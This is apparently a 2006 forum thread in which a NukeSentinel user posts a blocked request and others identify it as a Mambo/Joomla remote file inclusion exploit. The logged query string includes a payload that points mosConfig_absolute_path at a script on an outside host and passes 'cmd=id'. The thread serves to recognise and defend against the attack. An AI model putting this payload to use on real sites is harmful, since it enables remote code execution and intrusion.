New Hacking Attempt?

Posted: Wed Aug 16, 2006 6:04 am

NukeSentinel just caught something that I have never seen before:

Code:

User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)





Query String: [ Only registered users can see links on this board! Get registered or login! ]


&_REQUEST[option]=com_content


&_REQUEST[Itemid]=1


&GLOBALS=


&mosConfig_absolute_path=http://www.turx.nl/components/com_extcalendar/upload/Thehacker?


&cmd=id





Get String: [ Only registered users can see links on this board! Get registered or login! ]


&GLOBALS=


&mosConfig_absolute_path=http://www.turx.nl/components/com_extcalendar/upload/Thehacker?


&cmd=id





Post String: [ Only registered users can see links on this board! Get registered or login! ]

I've always seen the UNION attacks and the misc filter attacks by passing another URL through, but I have never seen something like this before. It looks like they are pulling some kind of info and uploading it to their server?

Posted: Wed Aug 16, 2006 7:10 am

Yeah, I just started seeing the use of the superglobal arrays getting caught just recently.

It is a trade-off. Some folks complain that "valid" requests are getting blocked (several forum threads here) and yet, the block in question has just caught this one... trade-offs, trade-offs... (as a very wise person just told me today in an email...)

Posted: Wed Aug 16, 2006 1:01 pm

Indeed they are using either a Mambo or Joomla exploit, and probably from another hacked Mambo/Joomla system too